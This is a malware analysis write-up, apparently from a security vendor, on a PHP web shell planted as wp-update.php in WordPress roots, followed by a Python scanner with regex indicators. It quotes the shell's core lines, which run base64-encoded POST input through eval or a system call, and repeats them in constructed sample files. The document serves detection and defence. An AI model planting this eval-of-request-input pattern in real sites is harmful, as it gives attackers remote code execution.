New Generic PHP Shell Malware In The Wild
Background
A massive infection in the form of a new generic PHP shell has recently been detected by Quttera malware researchers. We are still investigating all the incidents to find out the exact infection vector. Here is what we know so far:
- In most cases this shell was uploaded as wp-update.php to the WordPress root directory
- This is a generic shell script: it executes content that is provided in a $_POST argument called "sam"
How this shell works
- First, it resets the time the file was last accessed using the @touch function
- Then it checks whether the "eval" function is available by executing the following command: $l = eval("return true")
- After that, it decides how to execute the encoded script provided inside the $_POST[sam] variable
- If the eval function is available, the infection is delivered using the following expression: eval(base64_decode($_POST[sam]))
- If the eval function is not available, the shell dumps the provided script into a temporary file _ptemp and executes it using the "system" command: system("php _ptemp;rm _ptemp");
- The injected infection body depends on the input provided in the $_POST[sam] variable.
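As an added example (not Quttera's own scanner), the following Python flags PHP files that carry the constructs listed above; the indicator weights, the assumption that WordPress core ships no wp-update.php in the site root, and all sample file contents are this example's own constructions.

```python
"""Static indicators for the generic PHP shell described above (added example)."""
import re
from pathlib import PurePosixPath

# Each indicator: (name, weight, pattern). Weights are this example's choice:
# 3 = sufficient on its own to flag the file, 1 = corroborating only.
INDICATORS = [
    # Encoded payload taken from a POST parameter and executed directly.
    ("eval_base64_post", 3,
     re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_POST\s*\[", re.I)),
    # Fallback branch: payload written to _ptemp, run with php, then deleted.
    ("system_ptemp", 3,
     re.compile(r"system\s*\(\s*['\"]php\s+_ptemp\s*;\s*rm\s+_ptemp", re.I)),
    # Probe for whether eval() is usable before choosing a branch.
    ("eval_probe", 1,
     re.compile(r"eval\s*\(\s*['\"]return\s+true['\"]\s*\)", re.I)),
    # Error-suppressed touch() resetting the shell's own timestamp.
    ("touch_self", 1, re.compile(r"@touch\s*\(\s*__FILE__", re.I)),
]
# Assumption: WordPress core has no wp-update.php in the site root, so that
# name at the root (path relative to the web root) is a corroborating sign.
SUSPICIOUS_ROOT_NAMES = {"wp-update.php"}
THRESHOLD = 3


def scan_php(path, source):
    """Return (score, [indicator names]) for one PHP file's text."""
    hits = [name for name, _, pat in INDICATORS if pat.search(source)]
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    p = PurePosixPath(path)
    if p.name in SUSPICIOUS_ROOT_NAMES and len(p.parts) == 1:
        hits.append("wp_update_at_root")
        score += 1
    return score, hits


def is_shell(path, source):
    return scan_php(path, source)[0] >= THRESHOLD


# Constructed samples (not captured from a live site).
SAMPLES = {
    # Fragment shaped like the eval branch described in the write-up.
    "wp-update.php": '<?php @touch(__FILE__);\n$l = eval("return true");\n'
                     'eval(base64_decode($_POST["sam"]));\n',
    # Fragment shaped like the no-eval fallback branch.
    "wp-content/uploads/x.php": '<?php /* payload dumped to _ptemp */\n'
                                'system("php _ptemp;rm _ptemp");\n',
    # Benign: decodes a stored setting and touches a lock file, never input.
    "wp-content/plugins/cache/cache.php":
        "<?php $cfg = json_decode(base64_decode(get_option('cache_cfg')));\n"
        "touch(__DIR__ . '/cache.lock');\n",
}

if __name__ == "__main__":
    for path, src in SAMPLES.items():
        print(path, scan_php(path, src), "SHELL" if is_shell(path, src) else "ok")
```

The benign sample shows why base64_decode and touch alone are not scored as high-confidence: only their combination with execution of request input crosses the threshold.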